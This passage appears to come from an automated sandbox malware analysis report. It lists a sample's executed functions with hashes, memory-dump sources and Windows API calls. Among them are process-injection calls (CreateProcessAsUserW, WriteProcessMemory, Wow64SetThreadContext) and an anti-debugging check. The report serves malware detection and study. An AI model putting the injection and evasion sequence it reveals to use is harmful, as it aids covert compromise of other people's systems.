75634 85270b3 75632->75634 75633->75581 75634->75633 75635 8529c71 CreateProcessAsUserW 75634->75635 75636 8529ce8 75635->75636 75639 8527144 75637->75639 75638 8527166 75638->75581 75639->75638 75640 8529c71 CreateProcessAsUserW 75639->75640 75641 8529ce8 75640->75641 75643 8527386 75642->75643 75644 85273fb CreateProcessAsUserW 75642->75644 75643->75581 75646 8529ce8 75644->75646 75646->75646 75649 8527237 75647->75649 75648 8527244 75648->75581 75649->75648 75650 8529c71 CreateProcessAsUserW 75649->75650 75651 8529ce8 75650->75651 75651->75651 75654 85270b3 75652->75654 75653 85270d5 75653->75581 75654->75653 75655 8529c71 CreateProcessAsUserW 75654->75655 75656 8529ce8 75655->75656 75657 852c948 75658 852c98d Wow64SetThreadContext 75657->75658 75660 852c9d5 75658->75660 75661 852c1c8 75662 852c210 WriteProcessMemory 75661->75662 75664 852c267 75662->75664

                                                        Executed Functions

                                                        Function 08360015 Relevance: 5.6, Instructions: 5561COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 49 8360015-8360290 78 8360296-8360fbd 49->78 79 8362203-83624e8 49->79 485 8360fc3-8361287 78->485 486 836128f-83621fb 78->486 154 83624ee-8363447 79->154 155 836344f-8364448 79->155 154->155 720 836473e-8364751 155->720 721 836444e-8364736 155->721 485->486 486->79 726 8364757-8364db0 720->726 727 8364db8-8365d30 720->727 721->720 726->727 1110 8365d30 call 83672f2 727->1110 1111 8365d30 call 83672d2 727->1111 1112 8365d30 call 8367300 727->1112 1109 8365d36-8365d3d 1110->1109 1111->1109 1112->1109
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1b4e68f95bd19fd2100d366eaf1dfa510ecec36af8c2f74711602a627b852975
                                                        • Instruction ID: 971a234598439883ca3b4cb6f7179ecb50c1b1bee4f47731ee055a89dcbc181b
                                                        • Opcode Fuzzy Hash: 1b4e68f95bd19fd2100d366eaf1dfa510ecec36af8c2f74711602a627b852975
                                                        • Instruction Fuzzy Hash: B4B30770A12618CBCB58AF39D99566DBBF2FB89300F0085EDD44DA7250EB345D99CF82
                                                        Function 08360040 Relevance: 5.5, Instructions: 5545COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1113 8360040-8360290 1142 8360296-8360fbd 1113->1142 1143 8362203-83624e8 1113->1143 1549 8360fc3-8361287 1142->1549 1550 836128f-83621fb 1142->1550 1218 83624ee-8363447 1143->1218 1219 836344f-8364448 1143->1219 1218->1219 1784 836473e-8364751 1219->1784 1785 836444e-8364736 1219->1785 1549->1550 1550->1143 1790 8364757-8364db0 1784->1790 1791 8364db8-8365d30 1784->1791 1785->1784 1790->1791 2174 8365d30 call 83672f2 1791->2174 2175 8365d30 call 83672d2 1791->2175 2176 8365d30 call 8367300 1791->2176 2173 8365d36-8365d3d 2174->2173 2175->2173 2176->2173
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0fb22449cbf9d5d822d97e0a098df4f1e8e2f88daa7744a026f192219fbd7c28
                                                        • Instruction ID: 960af88552025fc09c1d60b59c34ecfe0010c4bd2a1fd29e7545dcd7b93fd152
                                                        • Opcode Fuzzy Hash: 0fb22449cbf9d5d822d97e0a098df4f1e8e2f88daa7744a026f192219fbd7c28
                                                        • Instruction Fuzzy Hash: 58B30770A12618CBCB58AF39D99566DBBF2FB89300F0085EDD44DA7250EB345D99CF82
                                                        Function 013E8278 Relevance: 1.0, Instructions: 975COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3445487594.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_13e0000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 753f16d24bb580a58c2a9950361f421880ea30056b2623c70844bef85c1f1054
                                                        • Instruction ID: afb5ba2f684fae5b2c45ce05d0b2018b83037d897abe85fb83a27f3f684f46f6
                                                        • Opcode Fuzzy Hash: 753f16d24bb580a58c2a9950361f421880ea30056b2623c70844bef85c1f1054
                                                        • Instruction Fuzzy Hash: 2E924E31A00229DFCB15CF68D988AAEBBF2FF88318F158595E549DB2A1D730EC41CB51
                                                        Function 078FADD3 Relevance: 6.1, APIs: 4, Instructions: 131threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentProcess.KERNEL32 ref: 078FAE5E
                                                        • GetCurrentThread.KERNEL32 ref: 078FAE9B
                                                        • GetCurrentProcess.KERNEL32 ref: 078FAED8
                                                        • GetCurrentThreadId.KERNEL32 ref: 078FAF31
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3475613566.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_78f0000_ACID.jbxd
                                                        Similarity
                                                        • API ID: Current$ProcessThread
                                                        • String ID:
                                                        • API String ID: 2063062207-0
                                                        • Opcode ID: 40a654c3c6666fb9dd4c4532082c46fd663e7e9204c2607260011776563bdb91
                                                        • Instruction ID: ea28818cb910b3723366fd6851087b2a8f3cce451e8a3a419bf49d68b7547892
                                                        • Opcode Fuzzy Hash: 40a654c3c6666fb9dd4c4532082c46fd663e7e9204c2607260011776563bdb91
                                                        • Instruction Fuzzy Hash: 625186B090034ADFEB18CFA9D548B9EBBF1EF88314F20C559E109A7360DB349944CB66
                                                        Function 078FADE0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentProcess.KERNEL32 ref: 078FAE5E
                                                        • GetCurrentThread.KERNEL32 ref: 078FAE9B
                                                        • GetCurrentProcess.KERNEL32 ref: 078FAED8
                                                        • GetCurrentThreadId.KERNEL32 ref: 078FAF31
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3475613566.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_78f0000_ACID.jbxd
                                                        Similarity
                                                        • API ID: Current$ProcessThread
                                                        • String ID:
                                                        • API String ID: 2063062207-0
                                                        • Opcode ID: 263bbd271e5e80e98bfbaa07b38679a87f4579f9315a87a5caf25f0fee8597bc
                                                        • Instruction ID: ba3e6d114fe3d292a5b0039da6d9051a5f39d25388bc8f5e5a32694bfce5df81
                                                        • Opcode Fuzzy Hash: 263bbd271e5e80e98bfbaa07b38679a87f4579f9315a87a5caf25f0fee8597bc
                                                        • Instruction Fuzzy Hash: D35166B090034ADFDB18CFA9D548B9EBBF1EF88314F20C559E509A7360DB74A944CB66
                                                        Function 078F8508 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3475613566.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_78f0000_ACID.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 59480adb6ef2ba2d4c7aba70f978d280f104fc356a3d2c44036efe2355e751d4
                                                        • Instruction ID: 53f83b15d80037b76e4eee689c8714d54917e3ab064b1b0c7ed60d71afa4525e
                                                        • Opcode Fuzzy Hash: 59480adb6ef2ba2d4c7aba70f978d280f104fc356a3d2c44036efe2355e751d4
                                                        • Instruction Fuzzy Hash: B47134B0A00B068FDB24DF2AD45575ABBF1FF88204F008A2DD59AD7B40DB75E849CB95
                                                        Function 078FEFF1 Relevance: 1.6, APIs: 1, Instructions: 142COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 078FF162
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3475613566.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_78f0000_ACID.jbxd
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID:
                                                        • API String ID: 716092398-0
                                                        • Opcode ID: af7b2ced0723ca9d3cf4ecf61a3a28567a0437ffefcd7d9e60ac0cf37189bb68
                                                        • Instruction ID: b4ab162b5cd190b62207d49156e667a4b950c25d83b22343d4af823d6404df24
                                                        • Opcode Fuzzy Hash: af7b2ced0723ca9d3cf4ecf61a3a28567a0437ffefcd7d9e60ac0cf37189bb68
                                                        • Instruction Fuzzy Hash: D651E0B1C00249EFDF15CF99C980ADEBFB6BF49310F14816AEA18AB220D7759995CF50
                                                        Function 078FCCF8 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 078FF162
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3475613566.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_78f0000_ACID.jbxd
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID:
                                                        • API String ID: 716092398-0
                                                        • Opcode ID: bf5e38b2cb2e7c285e5164a60a4bab6d5c47ee2cafd28f99b71af22082ad902f
                                                        • Instruction ID: b20db1c27efea6587e1711c1c25b825d7ad53f4634b8f77898b8c25a6fa75c2f
                                                        • Opcode Fuzzy Hash: bf5e38b2cb2e7c285e5164a60a4bab6d5c47ee2cafd28f99b71af22082ad902f
                                                        • Instruction Fuzzy Hash: 7751D1B1D00349DFDB14CF99C884ADEBBB5FF48310F24812AE918AB210D7759885CF90
                                                        Function 0557F5A0 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 0557F661
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3470065486.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_5570000_ACID.jbxd
                                                        Similarity
                                                        • API ID: CallProcWindow
                                                        • String ID:
                                                        • API String ID: 2714655100-0
                                                        • Opcode ID: cac308471da8741f16e064d9fd8eb14b9f7f94b455c088fc194663036575124d
                                                        • Instruction ID: ea0ac73d320e9e214efc512b476c63c78fff959beb90bd4d60a82424f9e9a993
                                                        • Opcode Fuzzy Hash: cac308471da8741f16e064d9fd8eb14b9f7f94b455c088fc194663036575124d
                                                        • Instruction Fuzzy Hash: 434103B8900309CFDB14CF99D488AAABBF5FF88314F24C459E519AB321D774A841CFA5
                                                        Function 078FB020 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,078FAFEE,?,?,?,?,?), ref: 078FB0AF
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3475613566.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_78f0000_ACID.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: 3e7fe020d1919fd8f1759a6a6169176aa1429b68be8d0ffaa03b4e83da0c0ada
                                                        • Instruction ID: 77346bd91c79f82fcff17aefdd974d2fef3182c1f4156395252c3abf908cc29d
                                                        • Opcode Fuzzy Hash: 3e7fe020d1919fd8f1759a6a6169176aa1429b68be8d0ffaa03b4e83da0c0ada
                                                        • Instruction Fuzzy Hash: A62105B5900259AFDB10CFA9D884ADEFFF8EB48310F14841AE918A7311C374A944CFA1
                                                        Function 078F9E02 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 078F9E7F
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3475613566.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_78f0000_ACID.jbxd
                                                        Similarity
                                                        • API ID: CheckDebuggerPresentRemote
                                                        • String ID:
                                                        • API String ID: 3662101638-0
                                                        • Opcode ID: 0857bed19c47e468eeed7d5e32d3532ec305f1c6f35c8ee43e8df1908ac7ded2
                                                        • Instruction ID: 40ac6d81d4ed274aaea0c5778c6d4f1c4babb7d502b07a003fbe0af25df46a87
                                                        • Opcode Fuzzy Hash: 0857bed19c47e468eeed7d5e32d3532ec305f1c6f35c8ee43e8df1908ac7ded2
                                                        • Instruction Fuzzy Hash: 422148B18002599FDB10CF9AC884BEEBBF4AF49320F14841AE559A7250D778A944CF61
                                                        Function 078F9E08 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 078F9E7F
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3475613566.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_78f0000_ACID.jbxd
                                                        Similarity
                                                        • API ID: CheckDebuggerPresentRemote
                                                        • String ID:
                                                        • API String ID: 3662101638-0
                                                        • Opcode ID: 0bc3fedb1a683b46d5b7eaec9e24764e77703f1eec0a5050516040d0e5ebe6a0
                                                        • Instruction ID: 133a699be6aef4dccb6ad601b93028bb934314aa157e3ba4a84d488853d4dfe3
                                                        • Opcode Fuzzy Hash: 0bc3fedb1a683b46d5b7eaec9e24764e77703f1eec0a5050516040d0e5ebe6a0
                                                        • Instruction Fuzzy Hash: EE2137B1800259CFDB10CF9AD884BEEFBF4AF49320F14845AE959A7250D778A944CFA5
                                                        Function 078FA9D8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,078FAFEE,?,?,?,?,?), ref: 078FB0AF
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3475613566.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_78f0000_ACID.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: 912230820d8b71fc3079d14f29397707966e0c417040ac2f12158e0c3ac8fc71
                                                        • Instruction ID: 720eec45f59667cb5f67259d9d36ee58862398f27e4a30bc65e2d4671fd0f8d0
                                                        • Opcode Fuzzy Hash: 912230820d8b71fc3079d14f29397707966e0c417040ac2f12158e0c3ac8fc71
                                                        • Instruction Fuzzy Hash: F121E6B5900209EFDB10CFA9D884AEEBFF4FB48314F14841AE914A7310D374A954CFA5
                                                        Function 078F8979 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,078F87D9,00000800,00000000,00000000), ref: 078F89EA
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3475613566.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_78f0000_ACID.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: dcf0896219a79e8135ae065df42c1c8c4274b5d792bc81b721a696a4ccaa5e64
                                                        • Instruction ID: ce1f68f13c19765c1388ca9a4016b2fa55e43d0060eff28c43e64dea9d760a6d
                                                        • Opcode Fuzzy Hash: dcf0896219a79e8135ae065df42c1c8c4274b5d792bc81b721a696a4ccaa5e64
                                                        • Instruction Fuzzy Hash: DD1126B6D003099FDB10CF9AC844BDEFBF4EB99310F14842AD559A7600C379A545CFA5
                                                        Function 078F7860 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,078F87D9,00000800,00000000,00000000), ref: 078F89EA
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3475613566.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_78f0000_ACID.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: f4c411061be4afc7b289bf2c809524a8fb22b402672daa4b22f0e39aca93d544
                                                        • Instruction ID: 8ea4ccfcef87a6410de141c58cfe17fdefb7c9c2b288979b95dd78e8eba420b4
                                                        • Opcode Fuzzy Hash: f4c411061be4afc7b289bf2c809524a8fb22b402672daa4b22f0e39aca93d544
                                                        • Instruction Fuzzy Hash: D71126B69003099FDB10CF9AC884BDEFBF8EB49314F14842AE659A7200C375A544CFA5
                                                        Function 078F9F88 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OutputDebugStringW.KERNELBASE(00000000), ref: 078FA000
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3475613566.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_78f0000_ACID.jbxd
                                                        Similarity
                                                        • API ID: DebugOutputString
                                                        • String ID:
                                                        • API String ID: 1166629820-0
                                                        • Opcode ID: 74d719232aeec20cca41dce6fad55840b555ba27a5877837ac95c3d85ee2956d
                                                        • Instruction ID: 0576106e4c1714978971cd4d7e8bdb3c9ecff52c1af73b104df4d1495a812e43
                                                        • Opcode Fuzzy Hash: 74d719232aeec20cca41dce6fad55840b555ba27a5877837ac95c3d85ee2956d
                                                        • Instruction Fuzzy Hash: EA1112B5C0061ADFCB14CF9AD844BDEFBB4FB89720F10811AE918A7640C778A944CFA5
                                                        Function 078F77FC Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,078F8524), ref: 078F875E
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3475613566.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_78f0000_ACID.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 2a8561415bac0e58b219b405c3cc0b1a87519de877933485204b6ede09fddb81
                                                        • Instruction ID: 773fe9c577d2ee0c61c0b37b53908d4314e0ff377cb8f486643e563fa964e28d
                                                        • Opcode Fuzzy Hash: 2a8561415bac0e58b219b405c3cc0b1a87519de877933485204b6ede09fddb81
                                                        • Instruction Fuzzy Hash: B21102B5C00749DFDB10CF9AC444BDEFBF4EB88614F10845AD519A7210D379A545CFA5
                                                        Function 078F9F90 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OutputDebugStringW.KERNELBASE(00000000), ref: 078FA000
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3475613566.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_78f0000_ACID.jbxd
                                                        Similarity
                                                        • API ID: DebugOutputString
                                                        • String ID:
                                                        • API String ID: 1166629820-0
                                                        • Opcode ID: a7493d2ad964a506fec76c4ef0cfaa5b816384c78590e8220e662f7a703c573c
                                                        • Instruction ID: 33b24623c1d00f1522b88bb11f0b8e9c67e3bd379c6c3f01503193e6ef6fe9a9
                                                        • Opcode Fuzzy Hash: a7493d2ad964a506fec76c4ef0cfaa5b816384c78590e8220e662f7a703c573c
                                                        • Instruction Fuzzy Hash: 6711F3B5C0065ADFDB14CF9AD844BDEFBB4FB89720F10811AE918A7240D774A944CFA5
                                                        Function 0836A690 Relevance: .6, Instructions: 590COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 41854076b615537d31c4daca2375a35708ee9b187337ff6df52870448ce1abcb
                                                        • Instruction ID: 480bfd948a64968c8d7e5e0ede8e79d98303810108ddf81b94a735d8e98ad3b3
                                                        • Opcode Fuzzy Hash: 41854076b615537d31c4daca2375a35708ee9b187337ff6df52870448ce1abcb
                                                        • Instruction Fuzzy Hash: AC120370B092458FC705BBBDD89562EBFF2FF85200F45856ED085E7281DE389855C792
                                                        Function 08369440 Relevance: .5, Instructions: 518COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 44f0d3f5969c4277d3600f41806165755f9755f91f7cef2011e2289650767d27
                                                        • Instruction ID: 0bb28575a57cacb1d958a242c4e8bd42af798652055892dc8c63c5a306831608
                                                        • Opcode Fuzzy Hash: 44f0d3f5969c4277d3600f41806165755f9755f91f7cef2011e2289650767d27
                                                        • Instruction Fuzzy Hash: 99E18770A11604CBC708FBBDE99866DBBF5FB88700F40896DD845A7791EE349C18CB91
                                                        Function 08369C68 Relevance: .4, Instructions: 436COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 57e51b0061cf39ef13b09630d3d9affd48b2e3280ec23292173db5d50573183a
                                                        • Instruction ID: a6efceae3532c898e1c36f642fc954a306d4efdf86c690bc96954ca206e258f5
                                                        • Opcode Fuzzy Hash: 57e51b0061cf39ef13b09630d3d9affd48b2e3280ec23292173db5d50573183a
                                                        • Instruction Fuzzy Hash: 54024874A14218CFCB08AF78E8996ADBBF2FB88301F808569E445E7344EF748951CF91
                                                        Function 0836F518 Relevance: .4, Instructions: 431COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a87d3a0db398dd8cac77da9fa579450e07687b10c05c7884018c1d0731638a3a
                                                        • Instruction ID: 72db64ab8a1b5f8aab203e63eb3b79becc9b5e3038cf9fbdbefd973e74ef5a15
                                                        • Opcode Fuzzy Hash: a87d3a0db398dd8cac77da9fa579450e07687b10c05c7884018c1d0731638a3a
                                                        • Instruction Fuzzy Hash: AEE17C70715605CBC308BB7DE9A862EB7E6FFC8610F41896CE48987354EE34D855CB92
                                                        Function 0836F4A0 Relevance: .4, Instructions: 409COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fc12d8073bb91029c2bf8592599ff893825a0f76e07a04bd7c8e1bd7db61e4cf
                                                        • Instruction ID: 46802440cd1f6f5d7b0422536f22e75de2edfa5cbc6f94d67ae18b98f9f1b5b7
                                                        • Opcode Fuzzy Hash: fc12d8073bb91029c2bf8592599ff893825a0f76e07a04bd7c8e1bd7db61e4cf
                                                        • Instruction Fuzzy Hash: E4D18D70715605CBC308BB7DE9A862EBBE6FFC4610F41896CE48987394DE34D815CB92
                                                        Function 08368DD8 Relevance: .4, Instructions: 409COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 15e904952e34ffcc471ac2e4c491b620e0198c07fdc24145b7fee94ba39ab415
                                                        • Instruction ID: 93beff3f0c3b9435a365e03975765bd4ef9fbdda95605209f1512cba8e8a6e47
                                                        • Opcode Fuzzy Hash: 15e904952e34ffcc471ac2e4c491b620e0198c07fdc24145b7fee94ba39ab415
                                                        • Instruction Fuzzy Hash: 50E17E70B11606CBCB08FFB9D99862EBBF6FB88600F514568D845E7384EA349C55CB92
                                                        Function 08367898 Relevance: .4, Instructions: 376COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d9826c1c8f7678d041b2ab366b5d31b70f5911c0ca402a9eabe2607475e1cc3e
                                                        • Instruction ID: c18a5c393a1879716cdeee04cc78aaaef33fe44d075909d5d9b36321c9fde95a
                                                        • Opcode Fuzzy Hash: d9826c1c8f7678d041b2ab366b5d31b70f5911c0ca402a9eabe2607475e1cc3e
                                                        • Instruction Fuzzy Hash: 13D1AC70B11605CBC708BFB9E99963EBBB6FF84601F818A28D445D7384EE389C54CB91
                                                        Function 0836F508 Relevance: .4, Instructions: 367COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 675b43eddbc414d2d02d3741ac5d250226ebf938866f02ef3235949fbf75a589
                                                        • Instruction ID: ea64926d0e4c8c184c47f634dd62d45cda9fcbcc9d65991edd8b004f40983e21
                                                        • Opcode Fuzzy Hash: 675b43eddbc414d2d02d3741ac5d250226ebf938866f02ef3235949fbf75a589
                                                        • Instruction Fuzzy Hash: 14C16C70715605CBC308BB79E9A862ABBE5FFC8610F41896CE48987354DE34D855CB92
                                                        Function 08368DBB Relevance: .4, Instructions: 357COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8c1a97257e82d00955886321a5706cc5e8d7bea9cdf905b6c30589dc5fe3e34b
                                                        • Instruction ID: eafb6ba48b71f146835e7c287a5e1aeb29c7b349d08606793791049608e72038
                                                        • Opcode Fuzzy Hash: 8c1a97257e82d00955886321a5706cc5e8d7bea9cdf905b6c30589dc5fe3e34b
